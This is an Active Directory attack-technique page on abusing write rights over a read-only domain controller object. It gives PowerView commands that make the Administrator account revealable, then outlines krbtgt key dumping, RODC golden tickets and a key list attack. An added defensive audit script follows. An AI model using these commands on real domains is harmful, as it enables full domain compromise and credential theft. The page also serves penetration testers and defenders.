
# Rights on RODC object

With administrative control over the [RODC](/ad/movement/domain-settings/rodc.md) computer object in Active Directory, there is a path to full domain compromise. The RODC's `msDS-NeverRevealGroup` and `msDS-RevealOnDemandGroup` attributes can be modified so that a Domain Admin is allowed to authenticate through the RODC and have its credentials cached there, after which those credentials can be dumped with administrative access to the RODC host.

{% hint style="info" %}
More precisely, any one of the following ACEs on the RODC object is sufficient as a starting point, since each implicitly grants `WriteProperty` on the `msDS-RevealOnDemandGroup` and `msDS-NeverRevealGroup` attributes:

* `GenericWrite`
* `GenericAll` / `FullControl`
* `WriteDacl` (the attacker can modify the DACL and obtain arbitrary permissions)
* `Owns` (c.f. `WriteDacl`)
* `WriteOwner` (i.e. the attacker can obtain `Owns` -> `WriteDacl` -> other permissions)
* `WriteProperty` against the `msDS-RevealOnDemandGroup` attribute, combined with another primitive that gives privileged access to the RODC host. `WriteProperty` against the `msDS-NeverRevealGroup` attribute is also required if that attribute includes the target account, since the deny list takes precedence.
{% endhint %}

{% tabs %}
{% tab title="UNIX-like" %}
From UNIX-like systems, [powerview.py](https://github.com/aniqfakhrul/powerview.py) (Python) can be used to modify the LDAP attributes.

```bash
powerview "$DOMAIN"/"$USER":"$PASSWORD"@"$RODC_FQDN"

# First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
# Then, append the Allowed RODC Password Replication Group group
PV > Set-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'
PV > Set-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'

# If needed, remove the admin from the msDS-NeverRevealGroup attribute
PV > Set-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup
```

Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md) and conduct a [key list attack](https://github.com/v4resk/red-book/blob/main/ad/movement/credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.
{% endtab %}

{% tab title="Windows" %}
From Windows systems, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (PowerShell) can be used for this purpose.

```powershell
# First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}

# If needed, remove the admin from the msDS-NeverRevealGroup attribute
Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'
```

Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md) and conduct a [key list attack](https://github.com/v4resk/red-book/blob/main/ad/movement/credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.
{% endtab %}
{% endtabs %}
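From the defender's side, the same three settings are what an audit should watch. The following script is an added example (not part of the original page or of PowerView) that uses the RSAT `ActiveDirectory` module to report, for each RODC, privileged accounts allowed in `msDS-RevealOnDemandGroup`, non-allow-listed principals holding the write primitives listed above on the RODC object, and any `managedBy` value; `$TrustedPrincipals` is an assumed allow-list to adjust per forest.

```powershell
# Added audit example (not from the original page). Assumes the RSAT ActiveDirectory
# module and a domain-joined session; $TrustedPrincipals is a constructed allow-list.
Import-Module ActiveDirectory

# Constructed allow-list of principals expected to hold write rights on RODC objects.
$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                       "$env:USERDOMAIN\Domain Admins", "$env:USERDOMAIN\Enterprise Admins")

# Resolve the schemaIDGUIDs of the two attributes so attribute-scoped ACEs can be matched.
$schemaNC  = (Get-ADRootDSE).schemaNamingContext
$attrGuids = @{}
foreach ($attr in 'msDS-RevealOnDemandGroup', 'msDS-NeverRevealGroup') {
    $schemaObj = Get-ADObject -SearchBase $schemaNC -LDAPFilter "(lDAPDisplayName=$attr)" -Properties schemaIDGUID
    $attrGuids[([guid]$schemaObj.schemaIDGUID).ToString()] = $attr
}

foreach ($rodc in (Get-ADDomainController -Filter { IsReadOnly -eq $true })) {
    $obj = Get-ADComputer -Identity $rodc.ComputerObjectDN `
        -Properties 'msDS-RevealOnDemandGroup', 'msDS-NeverRevealGroup', 'managedBy'

    # 1. Privileged principals (adminCount=1) whose secrets the RODC may cache.
    foreach ($dn in $obj.'msDS-RevealOnDemandGroup') {
        if ($obj.'msDS-NeverRevealGroup' -contains $dn) { continue }   # deny list wins
        if ((Get-ADObject -Identity $dn -Properties adminCount).adminCount -eq 1) {
            Write-Warning "$($rodc.Name): privileged principal revealable: $dn"
        }
    }

    # 2. DACL: broad write primitives, or WriteProperty on all attributes or on these two.
    $acl = Get-Acl -Path "AD:\$($obj.DistinguishedName)"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($TrustedPrincipals -contains $ace.IdentityReference.Value) { continue }
        $rights    = $ace.ActiveDirectoryRights
        $broad     = $rights.ToString() -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner'
        $attrWrite = (($rights -band [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty) -ne 0) -and
                     ($ace.ObjectType -eq [guid]::Empty -or $attrGuids.ContainsKey($ace.ObjectType.ToString()))
        if ($broad -or $attrWrite) {
            Write-Warning "$($rodc.Name): $($ace.IdentityReference) has $rights (ObjectType $($ace.ObjectType))"
        }
    }
    if ($TrustedPrincipals -notcontains $acl.Owner) { Write-Warning "$($rodc.Name): owner is $($acl.Owner)" }

    # 3. managedBy grants local admin on the RODC host; confirm it is intentional.
    if ($obj.managedBy) { Write-Warning "$($rodc.Name): managedBy = $($obj.managedBy)" }
}
```

Any warning on a principal outside tier zero is the condition described in this page; pairing the script with a change alert on these attributes (Directory Service Changes, event ID 5136) catches the modification itself rather than only its precondition.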

## References

{% embed url="https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06" %}
